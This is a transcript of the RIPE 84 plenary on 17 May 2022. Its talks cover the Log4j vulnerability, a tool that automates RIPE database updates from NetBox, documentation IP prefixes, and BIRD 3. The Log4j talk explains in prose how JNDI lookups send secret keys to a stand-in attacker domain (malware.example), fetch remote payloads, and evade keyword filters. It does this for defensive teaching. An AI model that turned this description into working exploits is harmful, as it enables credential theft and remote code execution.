RIPE 84
Plenary session
Tuesday, 17 May 2022
At 9 a.m.:
JAN ZORZ: Hello, good morning. It's 9 a.m. and we need to start the meeting. You can have conversation during the coffee time, thank you very much. My name is Jan and me and Dmitry Kohmanyuk will take care of this session.
The first one is virtual, Sankalp Basavaraj will talk about the log 4 jam debacle, I would like to ask Tom Strickx, who is also a presenter, if he is in the room. Tom, if you are in the room, please upload your slides! Otherwise you will be talking with blank screen behind you. Thank you. Sankalp Basavaraj, the stage is yours.
SANKALP BASAVARAJ: You guys hear me all right?
JAN ZORZ: Yes.
SANKALP BASAVARAJ: Thank you, all the way from India, so hope you have had your morning coffee. We had some interesting discussions yesterday on layer 3 stats so what we will do in this session is on Layer 7, we will examine Layer 7 security, but before we do that, a little bit about me. I am based out of India, senior architecture in Akamai, all my tenure I have worked with almost 300 plus companies across worldwide, on technologies like Internet security and web performance.
So a brief overview on the agenda. So in a nutshell, what I want to do in the session is to demonstrate how Internet security is evolving and also how we must adapt to it, right? As a beautiful use case I am using the Log4j as an example. You might have heard about this in news or Twitter handles, it's probably the worst that we have seen in the recent years, so we will look at what exactly is this, how did it work and a few personal insights on it and I will also finish it with a few recommendations of mine.
So, before I dive into the specifics, let's look at the brief timeline of the events to set up some context, so what happened is on the last week of November, a security researcher discovered a vulnerability in the Java utility and he logged it, so we do that, it's perfectly normal. But the storm was kick‑started on 9 December when somebody exposed this on Twitter and it was only therefore, I think it was only there for five to ten minutes but and it was later deleted but that was all it was required and then started the whole mayhem, right? So this vulnerability went haywire, attackers started exploiting it and it was so so bad that the director went on record saying this is the worst that she has seen, she went on record to to say that, she gave out an official statement, and of course it was given a code name 44228 and there were three parties, primarily, there was one side attackers who are constantly trying to evolve, evade and exploit this at the maximum and there were cybersecurity companies or the companies who were trying to thwart it and then trying to release patches and to aaddress this. So started the cat and mouse game, it went on for a while and went from bad to worse, right, to a point where within a few days we at Akamai were seeing about 2 million attacks per hour, that was the intensity of this attack and it's just company; I mean similar reports you can read in Google or other companies as well.
But even to this day, even to this day, and this has been four, five months, even to this day, I see logs on a routinely basis attackers trying to exploit this vulnerability and to quote my personal example, my sister's website, which hardly gets any visitors, probably 100 visitors per month, she even saw Log4j attacks against her website, that shows the pervasiveness of this attack.
Moving on. So, what is Log4j? So let's see what the heck is Log4j all about. Full disclaimer: I am trying to condense the information that ‑‑ the technical information into laymen for the benefit of larger audience, if you have any questions you can connect with me off‑line. Log4j is a Java based logging utility, what about the codes that we run on Java? Everything has to be logged, so this is one Open Source utility which is very famous and it's also, you know, helpful in debugging or event logs and all that stuff so since it's Open Source and very versatile it's used very widely.
One of the important features about Log4j is known as look‑ups, what is a lookup? Lookup is nothing but an expression. I have given an example there. I had this whole interactivity built in but I think in this it's showing ‑‑ anyway, lookup is nothing but an expression so when you include an expression, what does Log4j will do is it will read that and replace it with whatever the expressions is. For example in the first line at the right set I have written date something, all systems good. When Log4j reads that it will replace that with a date and say all systems good, very simple. One of the powerful features of Log4j is you can tag multiple such expressions together. In the third line, I have highlighted there, the lower case current user is something something user name, so I will take the user name and make it lower case and Log4j will log it as the lower case, current user, all of this will go into the logs, right?
Now, if it was only this we wouldn't behaving this conversation, it was powerful, simple, all good. But the problem started with a thing called JNDI? JNDI is nothing but Java naming and directory interface. What it does is, it gives the capability to this utility to go out and talk to certain external directories, be it like DNS, be it the Java, so it gives the power to go to the external world and interact with directories, right. And the way to ‑‑ let's call this a genie, the way to summon is using the expression JNDI. So I have given an example there, the current mail host is Java something so the moment the Log4j utility reads it, the ‑‑ the parameter, the JNDI will go to the and probably replace that with the configuration server file or host name. So that's how it works.
Now, fair enough, where is the vulnerability? Because it's clear‑cut, it's powerful, everything is good, where is the vulnerability? Let me demonstrate that with two examples of how this can be exploited and it gives you a sense on how easy it was to exploit this vulnerability.
The first is a data exfiltration factor, so assume, I am a bad guy and what I do is go and register a website called malware.example, I write an expression like I have done on the left side with JNDI, go log the secret key, append it to malware.example and whatever the host name that you get, and I this expression brute force, I smuggle it everywhere I can and if you think that's smuggling this expression to any environment is difficult, it's actually pretty easy; you can include it in URL or some ‑‑ it's very easy. So you just have to smuggle this in some header or something. The moment the Log4j reads this, right, immediately the JNDI would get summoned, it will take the ASS secret key, it will append to malware.example.com. Since I own the domain it actually does the DNS look up, now I have the AWS key or the secret key and I know where it came from so I know where it came from, I have the key, I have the key so I can easily, you know, compromise that data centre.
Example number 2: Remote code execution. So for this example, same thing, Sankab is the bad guy, he owns malware.example, do a lab query on this URL so that's how I say and I smuggle this again so JNDI being completely naive, it will send out the ldap query to a domain which I own and then I reply back, hey you might want to check out this URL, there's something probably interesting for you. And JNDI again follows that URL, downloads the virus, gets compromised. It was that easy, right? This is just two examples, but you can just, you know, think wildly is what I would say.
If JNDI was the problem here, why did we just not look for the expression and just block it? Just block the, wherever you see JNDI you just block it until everything is fixed. Makes sense, right? Here is where it gets really tricky. Here is where I want to share some insights which I experienced that day. If it were to be that easy we could have easily blocked it using something and call it a day but what happened was, once we did that, attackers became even more smarter and they were getting smarter and smarter by the minute. I mean it was chaos, it was like five days, 24 by 7, we had architects, we had supports, we had engineers all working, someone is looking at Twitter handle and posting here is a way to bypass the logic. So it was mayhem. So why it was mayhem? Let me share that.
If you block JNDI look for the expression 'unblock JNDI' that's not going to do the job because the attackers found new ways to, if you look at I have not written JNDI in the expression, I am calling ‑‑ parameter in upper case and when the computer or the Java utility, when it actually reads it it eventually lands on the same expression, but it's just that I cannot look for it in the initial, when I am scrubbing for that parameter it, that's where it became difficult and what was happening is, we were building ‑‑ to thwart attacks but then they came new, it was announced realtime and then we even saw logs where even though it was not announced on Twitter lots of experimental minds in the attackers so they started coming up with new ways so that's why it became very difficult to avoid or to thwart such attacks.
Now comes the big question: How bad was this vulnerability? If I am taking one use case, we come across lots of malware every day, but why am I talking about this? How bad was this vulnerability and I have collected a few excerpts, you can take a look at it, and that will give you a sense on how bad it was. I mean the Belgian defence ministry was shut down, the Federal Trade Commission came out and warned companies you should the no not be compromised, who penalised a certain company for 700 million because they got compromised and there are strict diktats, strict rules by regulating agencies that, warnings sent out to companies you should not full victim to this because that would mean loss of information and that's a bad place to be in. I mean, imagine, I was talking to one of the CEOs the other day and he casually mentioned to me that he started his company in 2012 but, somehow, it didn't kick off and he is restarting it again, that's a ten‑year gap and I asked him what happened, you had the idea why did you wait for ten years. He said a ran come ware attack on my company back in 2012 and I had lost all information so I had to build everything from scratch. That's the impact that such attacks have. The financial impact, the impact that a brand takes, the beating that a brand takes, it's colossal.
Again, this must be a one‑off event, right? That's not ‑‑ wrong. I mean, that's wrong, it's not a one‑off event, what we are seeing in the pandemic is, it's not only changed the way we behave in normal life but also the digital life as well. I mean I am taking the data of 2020 and you can almost see there that there's almost 80% increase in digital usage and we are living in 2022 so you can only extrapolate it, right? So what does the stats tell us? That the attacks or the points when the hackers can exploit, have increased exponentially and not only that, the Log4j is a classic example of how the attacks are evolving, no longer attack one virus where you had and you picked it it up using signatures. That's outdated and it's probably dead. So now, attacks are evolving thanks to social media and the digital option so the penalties are massive.
What is the solution? Right. One word: Zero trust. And if you haven't heard about zero trust it's not a new concept, it's been there for a while, probably a decade, but it hadn't picked up pace. Those of you who don't know what it is, it's certainly not what I'm showing in my slide. Zero trust means authenticate, authorise and examine everything. Don't take anything for granted. Don't trust any entity and say you know, incoming connection or this is an employee, it's okay. No. You have, by default, have a mindset that you have been compromised by default and you have to authenticate and authorise everything or examine everything, so that's the way to approach, that's what zero trust is.
In line with that, I have jotted down four security recommendations but before we even go on to that, I want to explain a fundamental principle when we are talking with security, so the attacks are constantly evolving just like the coronavirus, there is always a new variant every day and all day, how do we stay ahead of the curve? That's important. I am taking the same example of Covid, how are we staying ahead of the curve in terms of Covid, we are testing insanely. Why are we doing that? To catch the new variant as soon as possible. The same applies to security domain. We need to catch the attacks as early as possible. So back in the day we had just one firewall sitting at a data centre reduced to scrub the traffic or continues connections, all the traffic that was incoming but gone are the days, we cannot afford to have that simply because it's way too closer to the chest and these firewalls are practically dead, right? So, the way to approach is catch them as early as possible. If you ask me, or any IT security architecture for that matter, how early are you referring to? My answer would be catch it at your browser if possible, or your laptop, don't even let that flow into your data centre where all your information is stored, right? So, but of course, that's not possible, right? So, we need to have check posts in place, right? We need to have some sort of Cloud security in place which will weed out the attacks before they will reach to the data centres but does it mean it's a foolproof solution? No. That's why we need to build our security immunity at the origin or at the data centre itself, right?
So I have devised, in line with this theme, I have given four security recommendations, very ‑‑ what we say ‑‑ very high level I have given that, so let's discuss it.
The first one, following the same theme, catch them early, right? The other day I was giving a talk on zero trust and I talked about how zero trust is applicable to IT and everything and an interesting came and somebody told don't you think we should maintain the same thing for the code as well, what about the code that we write, on websites and all that, don't you think it should be zero trust policy should be applicable to that too? I was, yeah, that's actually true because security starts at the machine where you are trying to access the site? And classic example, look at the ‑‑ look at the snapshots that I have given, it's a popular Garmin site which I was analysing two days ago, it's an important site and the log‑in screen is sitting there like a duck, you know, waiting for an attack, so I tried to simulate and I was successful. It's an important site.
So, my firm belief is there's a lot that can be done at the machine, at the client level itself, so one of the examples is DNS, right? Maybe go for high ‑‑ more security DNSSEC or DOT protocols, are not a big fan of DOH, but DNSSEC or DOT if you are running the domain that is.
I see companies which are using SSL and it's hard to believe. I work with so many companies I see that at least 25, 30% of the companies demand that we don't log SSL. So that's a concern. It always starts with DNS and then comes to SSL, right? So get these two things right. And after that there is this one recommendation which I would like to highlight is CORS, that is a way to tell the browsers to behave. It's complicated to implement, but if you implement it properly, it's just a bunch of headers that you are seeing. For example, the snapshots that I have given there, if you are just sent one CORS header to the browser then probably this would have been avoided, this click jack attack would have been avoided, but it's a little bit tricky to implement, that's why people don't go for it, do it, spend some time on it, spend some resources on it and implement it and the attack Vector, or the attack surface reduces significantly. Your page will no longer be prone to data leakages and all that stuff. Right?
And the second is, build a check post. That may be a proxy, it may be a CDN, a Cloud security firewall, whatever it is, are not the traditional firewall but the Cloud, the check posts are not fully effective but they can sit and scrub and weed out at least some of the traffic. They can do much deeper inspection than what your firewall, and one recommendation I would like to highlight is, have ‑‑ it's not only enough to have a Cloud firewall but it's also essential to have a sandbox or a honeypot model. So one of the things that I see in the real domain is not a lot of companies have honeypot implementation, what is that? It's just a replica of your site so when an attacker tries to attack your website or API or whatever, he or she will automatically get redirected to this replica and the attacker will think he is operating on the main site but you on the ‑‑ you know, on the back‑end, would be getting all the attack vectors or the attack information from the back‑end, right?
Complex, again complex stuff to build, not a lot of companies go for it. But if I am talking in terms of getting ahead of the curve, this is the best way to do so. Have something called a sandbox or honeypot so you know what happens when bots attack. When you block something you look at the IP, you look at some Vector and you block it, they will know, they will know that this has been blocked, they will come up with another way, they will find another local and again attack you, and this is a common pattern in the security domain, right? So if you block one thing, they will find another way. So, honeypot is a Holy Grail for such scenarios because the attacker will think his attack is success but you are getting all the information, all the traits of the attack itself by sitting at the back end, right?
And having a good page and intermediate proxy would that do the job? No, that used to work like 10, 15 years ago but not any more. One of the important aspects that we should be mindful of is the way that attacks are evolving, right? Earlier, we had providers, but nowadays these threats are moving inside an organisation, inside an enterprise, inside a company. A classic example: Twitter hack, the crypto hack, Elon Musk's Twitter account got and he founded a lot of stuff and a lot of celebrities got hacked. They found the cause for that was probably an employee that got compromised and I have added anything snippet from a news item that I picked last night some news item, an IT admin got pissed off by the employer and wiperd all the data. So, no longer are the attacks external but they are moving inside the organisation which becomes even more difficult to weed out, right?
Suppose your employees is browsing something, some site which is not supposed to and that has some sort of virus and that's enough to infiltrate your organisation, right? I mean, for the attacker he has to be right only once, but from the other side, from the defender perspective we have to it be right always; every asset should be secured. And most of the ‑‑ the trend that I am seeing days is companies going for MFAs and thinking that they are secure but that's not the case. It's not enough. MFAs, regulating a bit of access in the active directories is certainly not enough. We need to take it up the notch. MFA is proven to be as easily hackable as a normal name and password. So, we had to stay ahead of the curve again. Having an MFA algorithm which sends out an OTP is definitely not enough. We have to look at the algorithms which are the standards or the methods which are used to generate these RTPs, I think FID O2 is one of the best standards, we had to always have, you know, stay ahead of the curve.
And the last recommendation, right, if I follow all three tips will I be secure? Not really. So there will always be these zero which will impact you. Zero trust philosophy is assume you have been attacked, so how should we build our infrastructure? So that's where this micro segmentation concept has taken birth. It's basically nothing but a spin on the VLAN which we used to have, right? It's just VLAN on steroids. So what we say here is, instead of the traditional one company, one data centre and data units, build individual units which act as separate entities and shield them such that if one active directory gets compromised, it will not spread. It's a containment measure. Of course we have done it with VLAN but this is nothing but VLAN on steroids, so we are regulating the chatter between two VLANs or two networks and who has access to what in the other VLAN, so we are regulating ‑‑ authenticating every packet that flows.
That's it for today. It was a short presentation but my thought process was that, you know, to put it in most layman terms on how security domain is evolving but if you have any questions you can put it in chat, I think we have some time or you can also connect with me on LinkedIn as well, I have given the handle.
JAN ZORZ: Wait. Go.
JELTE JENSEN: These are all very good tips but I want to talk about Log4j itself. So isn't the fundamental problem of the Log4j issue something we learnt 30 years ago with SQL, don't pars untrusted user input?
SANKALP BASAVARAJ: Right, we have all these contingencies in place, we know this stuff but they call it zero vulnerability. I think a couple of weeks ago, Chrome announced a zero vulnerability. It's good when we don't know it but when it's announced, people are like, okay we goofed that. So the point is that we are always ‑‑ there will always be that one bug which is, you know, what do we say, unexplored and somewhere along the lines one might catch it, so we have to be ready.
JELTE JENSEN: Okay, thank you.
DMITRY KOHMANYUK: I read text question in a text chat. Daniel Karrenberg from RIPE NCC: Does it mean that better built all our IT backup again from scratch?
SANKALP BASAVARAJ: If we are talking in terms of micro‑segmentation or even zero trust, yeah, yeah, and that's why most companies don't go for it. You know, I have seen some hesitancy to reject the entire IT, because I mean, if I am pitching this to Amazon and say you have to change the way you work it will be met with backlash, but then again, the cost of, you know, being compromised is way too high so we might as well see what we can do, right? At least if not full, at least some parts we can fix.
SPEAKER: You say it's proven that multifactorial authentication is as easily hackable. What do you mean by that because that makes no sense to me.
SANKALP BASAVARAJ: The traditional notion is the ODPs or the push tokens are safe once you have that on your website, it cannot be hacked, but that's not a foolproof solution.
SPEAKER: I understand it's not foolproof, but surely there is some value added?
SANKALP BASAVARAJ: Yeah, it does add value, yes, it does add value, probably it will avoid some attacks but it's not foolproof, that's what I meant.
SPEAKER: Okay, thanks.
JAN ZORZ: Okay, thank you, Sankalp Basavaraj for this very good presentation.
(Applause)
DMITRY KOHMANYUK: We are glad to hear our next speaker, that's Christian Harendt from Inter.link, you have your short presentation, you are welcome.
CHRISTIAN HARENDT: Thank you and good morning. Thank you for joining my talk. I am from Inter.link and I love to automate all kinds of network related stuff so I am going to show to you today with you can do with RIPE database with some automation to fill it in with data from NetBox.
What is the problem? Depending on your size of your organisation you are dealing with hundreds or even thousands of prefixes. On the other hand, you have these RIPE policies. So you have to document all these prefixes you have in the RIPE database with all these policies which we all love to do, so this is how your RIPE database entries look like, right? Or is it more like that? And this is your facial expression with the next RIPE RFC.
Let's face it, keeping these objects up to date isn't much fun, it's prone to errors, you can forget about something, it's manual work, it's boring, so there must be a better solution to this.
So, we have looked around and we have discovered, we have NetBox, which is our single source of truth where we document all of our prefixes and what's good about NetBox, it supports web hosts, in case you don't know a had he been hook is a sent to pre‑defined URL whenever you create or delete an object. We have looked at the RIPE database and offering a rest API as well, nice, just put the URL of the RIPE database API into a NetBox Webhook, problem solved.
Okay, it's not that easy. It's great to have all this data, all of your prefixes documented in NetBox but the RIPE database needs additional information, like admin contacts, abuse contacts, maintainer objects, organisational objects, you know it.
So how do we bring these two together?
We have looked around and is there any cool Open Source tool we can use for this but if we couldn't find any so we have developed our own solution and we call it RIPE‑Updater. What do we want to achieve with the RIPE‑Updater?
So most important part is to automate the INET(6)NUM objects which are the most frequently updated objects in the RIPE database. What also would be nice if you add some validation to it. We do not want to document the RFC1918 addresses, this is our private stuff, we will not put it in the public RIPE database in the Internet. We also want to check for overlapping prefixes that could happen when you resize or split a prefix. So we want to take care of this. The next step is very important for us, it must be very easy for the administrator to document these prefixes, so all the additional data should be based on templates which you can select with a drop‑down list in NetBox. It would be nice to get some back‑ups before you delete or overwrite an object in the RIPE database and lastly you get some e‑mail reporting so you can keep track of what's going on.
So what do we need to run the RIPE‑Updater? Of course you need NetBox at least Version 2 .4 or later, Webhook and some custom fields and two of the custom fields I want to highlight here. The first one it's thought in the prefix and called RIPE report, it's a bullion and basically just determining if you want to have this prefix documented in the RIPE database or not, and the second one is the previously mentioned drop down list of all your templates.
So, what else do you need to run it? Of course you need RIPE database access with maintainer password and you need a platform to run this on. We have chosen Docker for that and I think it's most easy solution but you can use whatever you like, it must be able to run Python codes and put reverse proxy in front of it and you are good to go.
Let me give you an example. Here I'm creating a new prefix and I have set the RIPE report to true because I want this prefix to be documented in the RIPE database. So next step is you select an appropriate template from the drop down list and when it will create this prefix, the following things will happen:
NetBox will send a Webhook to the RIPE‑Updater containing all the data you have just put into the prefix. The RIPE‑Updater will see the template and read it from the file system and sees there all the additional information we need. In parallel, we do the overlap check, which is basically go into the RIPE database and check if there's an overlapping prefix and if we found ‑‑ you have found an overlapping prefix, we will then check back with NetBox which is our single source of truth and see if this prefix is also present in NetBox. And if it's not, it is considered to be deleted but not before creating a backup of it.
Now we jump back to our main part which is to document this newly created prefix in the RIPE database and the RIPE‑Updater will make the information from the prefix, from NetBox and the selected template together together and put it in an app I code to the RIPE database which you can see in the bottom right. Finally, you will receive an e‑mail so you can keep track of what's going on.
So, let's recap:
With the RIPE‑Updater your database is always up to date and it's consistent and you can be as relaxed as this guy when the next RFCis coming in. One thing I want to mention, you can batch process all of your inetnum objects. You want to add in new contact, you put the contact into the template and then just select all prefixes in NetBox, click on mass edit and click save directly without any change and will trigger a Webhook for every prefix and will make sure every prefix is up to date in the RIPE database for you.
So but one question remains, this is great, but why am I telling you all about this? It's because I am very proud to announce we are going to release or we have released the RIPE‑Updater on GitHub you can check it on the URL on the bottom, you can have your data entries, I want to thank you for your attention and do you have any questions?
(Applause)
JAN ZORZ: Thank you very much. That's cool. I am using NetBox, excellent stuff!
SPEAKER: Andrei, RIPE NCC. I wonder if you do this update does it actually update objects in the RIPE database or delete and recreate them?
CHRISTIAN HARENDT: I will check if there's already an object present, it will only update if there is any change to the objects.
SPEAKER: It will do update, not delete and recreate?
CHRISTIAN HARENDT: It will only delete and recreate in case you have resized the prefix.
SPEAKER: Thank you.
SPEAKER: Rinse Kloek, I am personal person. One question: Does this work for notable?
CHRISTIAN HARENDT: It may be I have not tested it yet but the data model should be very similar but ‑‑ you could try it out, it might just work.
SPEAKER: Okay, thank you.
JAN ZORZ: Thank you. Anyone else have a question?
DMITRY KOHMANYUK: Text one, actually two now. The first one is bred care, he case: Does potentially support other products that support web hooks?
CHRISTIAN HARENDT: Other what?
DMITRY KOHMANYUK: Does your data potentially support other products that also support web hooks?
CHRISTIAN HARENDT: Other products than NetBox? Yeah, maybe auto bot is supported, basically it will support everything which has the same data structure model as NetBox has, but which may be an auto bot but other than that, I don't know.
DMITRY KOHMANYUK: Thanks. It's a good question, do you want to replace NetBox or the RIPE database with other registry database. Thank you. The other one one is: Does the two respect respect the RIS API rate limit and anything specific necessary?
CHRISTIAN HARENDT: The rate limit?
DMITRY KOHMANYUK: The API has a rate limit, maybe somebody creating 100 of new networks at the same time.
CHRISTIAN HARENDT: We have not taken care yet about it but this might be a nice addition in the future, yes.
DMITRY KOHMANYUK: Yes, I guess going to use the product as well, I like NetBox, it's a good step in the right direction.
CHRISTIAN HARENDT: Thank you, that's great to hear.
JAN ZORZ: Thank you very much.
(Applause)
DMITRY KOHMANYUK: Okay everybody, our next speaker is Tom Strickx, I am not sure if I spell the last name properly. It's about RFC3849 and RFC5737. Tell us please, more.
TOM STRICKS: Good morning, everyone. It's amaidsing to be back here, it's been too long (amazing (/STPH‑PL although I guess it's still March 2020 for some of us at least. I am going to talk about two specific RFCs, normally that's not the most exciting or interesting conversation to have, I am sure, but I will trite to make it interesting.
The reason why I want to talk about the documentation and RFCs is because documentation matters, and it's one of those annoying things that we easily as engineers can forget, it's coding that's the fun bit, configure the network is the fun bit but documenting the network is not the fun bit and that's why we have solutions like NetBox because they do it for us. It means I don't have to write the documentation myself.
But in this case, it's even worse, take you back to ‑‑ this is now two or three years ago easily, and we got a ticket where we were seeing consistent CRC errors on our egress ports on a topper rack, it's to E W R03 in, you know what the Cloudflare references are for the network operators group so if you see that in an e‑mail from us, now you know.
So we have splitting errors and it looks like this which is really interesting. Each individual colour is an egress interface for a compute node that we have, so normally the procedure that we take, whenever we are seeing egress errors or ingress, we just take that compute node out of production that's because the easiest way of doing things, so we remove the node from production with the expectation it's a faulty Nick or there is a bad patch cable but instead of the errors going away, they stuck, just on a different compute node, which is weird because that usually indicates that something else is broken. So I saw this happening again, removed it from production, the errors came back. Again, on a different node. Something clearly is happening here that is not within the expected behaviour for any of our operators, where we kind of know what's happening. So eventually what we did is we asked our SRE team, the people responsible for managing our compute side of things, to enable a specific option on the nick that aloud us to packet capture broken frames because otherwise the kernel gets to them too early and they get dropped before we can TCP them so we actually started looking at this and what we were seeing was that the Nexus switch because these are Nexus switches actually an example of cut through forwarding system so it's not doing store and forward just cut through, and it was detecting a bad CRC coming in, it was collaborating that and sending it forward, that usually indicates the Nexus switch in one way or another was receiving an already broken frame, but instead of dropping on ingress, it was dropping it on egress instead of ingress. But the way that our architecture is laid out the TORs are the last node in the network. There is a bunch of different network kit in front of those racks that if there is a broken frame in there should have seen that broken frame.
So, this kind of explains what's going on, like, we are doing some fancy things within the switch so that makes sense why we are seeing it on egress not on ingress, but we should be seeing that on our core switch, we should have seen that on our edge router where the traffic was coming in from. So something is weird. So, like I said, we enabled our RX‑FCS, it enables us to do the packet captures and we had to look at that and this is the packet capture we saw. You see just a bunch of ACKs. The weird thing you might start paying attention to this is this thing. The annoying thing with this is, if you look at the packet capture you might be able to see that there's actually some encapsulation things here, it's ER span traffic that we are seeing. For those who are not in the know, that is a Cisco protocol that allows you to G RC packet captures and forward to in arbitrary location allowing you to do port mirroring without needing to have a machinely hooked up to the switch itself. So the thing is, we were still wondering, the frames themselves, the G R packets themselves were perfectly fine. Like, normally if things are broken in Wireshark you will see they are red, they get nice colour coding and very indicative that something is broken, fix it. That's not the case here. It's like the nice yellowish, green, don't take my word for it, I'm colorblind, but apparently what was happening is the Nexus switches have a pretty dam notorious system where they are looking deeper into packets than they should. What the Nexus system was noter erring on the ER spam packet but on the packet within the ER spam packet itself. The packet within the spam packet was broken packet and that's what the switch was complaining about. That's not helpful for anyone, especially because it's not documented, we couldn't find any documentation anywhere on the Cisco website that told us this is the thing it does, we just kind of had to go with, as I think all of us do, a lot of the time, unfortunately, is relying on our connections, relying on the people that we know.
But again, what does that have to do with documentation besides the fact if there is anybody here from Cisco if you could document that behaviour it would be of help. If you recall that packet capture, there was something in there that probably shouldn't have been in there and it's this, and some you might recognise that IP address as running the specific service that doesn't have anything to do with ER Span, I think it's something to do with DNS. But so what was happening is, an operator in a network that won't be named was also I think running Nexus switches because I found some documentation on the Nexus website and as far as I know it's still online, and they are telling this is how you configure ER span, that's cool, right? Be nice if they couldn't, maybe.
It gets even worse, is that it also says the source IP to 1.1.1 .1 which is in and of itself pretty interesting thing. If you look at the packet capture you will see ‑‑ let's go back a bit ‑‑ I blurred it out but the source is also 1.1.1 .1, so we are getting some weird traffic, unfortunately. And yeah, that kind of needs to stop because ‑‑ and also, like the thing is this is ‑‑ we are no longer 2020, I want to still be 2020 but this is now four years ago, this is more than four years ago, it's about time that you start updating your documentation. The thing is, obviously it's not just Cisco doing this, unfortunately it's even Cloudflare doing this and we are the ones operating the damn thing. As you might see, that's not the documentation prefix, like we don't even own that prefix, I don't know who owns that prefix, sorry if you do.
There's other things where, like sometimes we make our labs and 1.171.1 is an easy IP address to use in labs because it's short and I now remember the documentation prefixes because I have been giving this talk a couple of times and they stick understandable for people to use those IP addresses that's fine. When you get called on it, the fact that I messed up, it's not going to happen again. Not you are blocked, that's just a bit awkward for everyone involved really. So the easiest way to fix that is with two specific RFCs, RFCs that have been around for a long time, they are probably older than some of the newer RIPE attendees which is amazing, but 3849 has been around since July 2004 and 5737 since January 2010. You can't blame ignorance, especially since you have seen this talk, I will find you. As a reminder for those in the back, generally write them down, remember them, it's not hard, it's 2001: DB 8.... /32. Use it. And for IPv4 we even have three of them, you can vary, you can be nice and just kind of, variation is the spice of life. Use it. Three of them, 192.0.2 is probably the easiest one. I think I included the test net with this, for all intents and purposes it's good enough. Please use one these instead of 1.1.1.0 /24, it makes my life easier because I don't have to run through a bunch of weird documentation that might have hit my network that shouldn't have hit my network. As a closing statement, it shouldn't be that difficult really, I mean, I know it's easy and we all make mistakes but if you make that mistake just do it once and then watch my talk again and then don't make it again. And that was it for me. I want to thank all of you for your attention, I want to thank all of you for definitely using those RFCs because you all will now, I hope, and yeah, that's it.
(Applause)
JAN ZORZ: Thank you very much. Now I know who is first. Oh boy.
JEN LINKOVA: Thank you for reminding everyone about those RFCs. I have one comment on, I don't know, question: Using those RFCs should solve half of the problem because what I did twice I looked in amount of packets with sources from 201(d) B 8, people do actually read the documentation and do use those addresses as a source addresses for those packets, right? And ‑‑ yeah, I don't know what you can do about this but at least we can filter them.
TOM STRICKS: Exactly. That's the thing, unlike the 1.171.1, we all allow pretty much all traffic because it's interesting and job security because I can make talks like this. With the documentation prefixes if you follow MANRS you /TKROPL them at your firewall ‑‑
JEN LINKOVA: I am surprised how many people might start announcing ‑‑
TOM STRICKS: I have seen it all the am time. At that point it's also part of the community's responsibility to drop these on the BGP border, order firewall border but that's workable because they shouldn't be routed or traffic on them, so ‑‑
JEN LINKOVA: So I guess it will be too late to ask you guys to sack if I rice 1.1.1 as documentation prefix so I don't know who owns 1 to 3, maybe those people can make that prefix documentation
TOM STRICKS: That probably would have been a better idea.
WOLFGANG TREMMEL: DE‑CIX academy. Can you ask one slide to your presentation us because there are AS numbers reserved for documentation.
TOM STRICKS: Indeed, there are, I will.
(Applause)
PETER HESSLER: OpenBSD. Do you have any comments about people using IP addresses that will never be seen on the Internet, for example the US Department of Defence address ranges?
TOM STRICKS: I mean, the same thing as like using the documentation prefixes in your own network for routing, it's ‑‑ it sucks to be you, I guess. We are going to drop it on your firewall, we are going to drop them, so if your stuff doesn't work, then the same thing with RPKI, if you are going to be announcing invalid and using traffic on that invalid then ‑‑
PETER HESSLER: As we have seen with for example the UK department of water I believe, that was all not announced and then they sold it to the public and now it's being announced and having interesting conflicts in the wild.
JAN ZORZ: You can't press the button.
SPEAKER: I am Will, I was wondering maybe we should do something with AS112 and start announcing those prefixes on IXP, I am wondering because some people will not filter those and, yeah, I'm not filtering those accurately right now.
TOM STRICKS: You should.
WILL: Sorry, I think AS 112 that's the one taking care of the ARPA stuff, but to what ex end because the primary point at that point is you are being a waste basket for the bunch of weird packets, right? Yeah. I am not 100 percent sure what the value ‑‑
Will it was more a thought process if anyone was thinking if I was clever or totally stupid and not awake.
TOM STRICKS: No comment.
JAN ZORZ: Okay, there is no people in the queue. Are there any questions in text?
DMITRY KOHMANYUK: No, we missed one question from last presentation but he knows about that. Not of this one.
JAN ZORZ: Thank you, Tom, very much.
TOM STRICKS: Thanks, folks.
(Applause)
DMITRY KOHMANYUK: Maria, you are already here. Maria will present about recent version of bird 3.
MARIA MATEJKA: Hello, I am from cz.nic, I am a developerer of the routing software bird for several years, I think since 2015, and the quo volume as ‑‑ the bird is more flying than walking so it's where are you flying? (V OL AS).
Maybe this way. Okay. First of all, thank you for addressing community, it's been rough two years with the Covid pandemic, especially for people like me, we were locked in with lots of unrespecting people. But it's good now.
The ‑‑ has been a long requested update so I now can say that it's going to be here, but let's start with some parts of history. I hope I got these dates correctly, I may be off by a year or something like that, it's just a common mistake, so it's by one year maybe, somewhere. But in 1998 there is the first commit in bird history, that commit is adding a presentation in Czech so there's no need to read it, or use Google translate. Nobody has ever translated it but it's a nice piece of history.
The code has been heavily optimised for 86 and when bird was released and the first development was closed, there was no notion of even dual core architecture, so ‑‑ but in 2005, the first dual core CPU was announced for PCs but it was, I think, inter core 2. It was just ‑‑ bird was just quite done and working. And then there were lots of years when almost nothing happened. Anyway, all this time bird thought or BIRD creators thought that IPv4 is going to die. And in 2017, we finally dropped this assumption and we integrated IPv4 into the IPv6 version and, now, we fully support running BIRD with IPv4 and IPv6 together. We were trying to push IPv4 outside as hard as we could. We failed. And in 2017, also I think the first 16 core CPU was made available, so, I think it's something like five years since a reasonable ‑‑ since there was good reason to make BIRD ‑‑ so it's 2022 and we are coming.
What is done? The new filter engine is done. It was completely impossible to make it ‑‑ so the first thing had to it be to rewrite the filter engine. The big thing what happens inside BIRD now in BIRD 2 is that the routes are propagated as they come in. There is no delay, almost. It just waits until there is some space on the wire. It's not possible to do it in the environment because we could get in lots of dead locked programmes when accessing the routing tables so we had to make some breaking points, some queues, which also brings quite a lot of possibilities to implement minimum route advertising, after lots of years when this was completely impossible in BIRD. So, there were some people asking for flap dampening or something like that, yes it will be there, not in the BIRD 3 but it will be there.
The three things that are separated into the thirds are BGP, RPKI and pipe threads where pipes are these things moving routes between ‑‑ between two different tables. The RPKI non‑blocking loading is quite crucial because when you have lots of CPUs doing the BGP, now it's not the one CPU doing the BGP and sometimes checking RPKI, now it's all your CPUs doing BGP and we don't take any liability for you locking yourself outside of your router by running BIRD, just because you forgot to set a C group to lock your BIRD inside not ‑‑ inside some part of the CPUs and let at least one core for maintenance. We can't take any liability for you breaking your hardware. It's your fault.
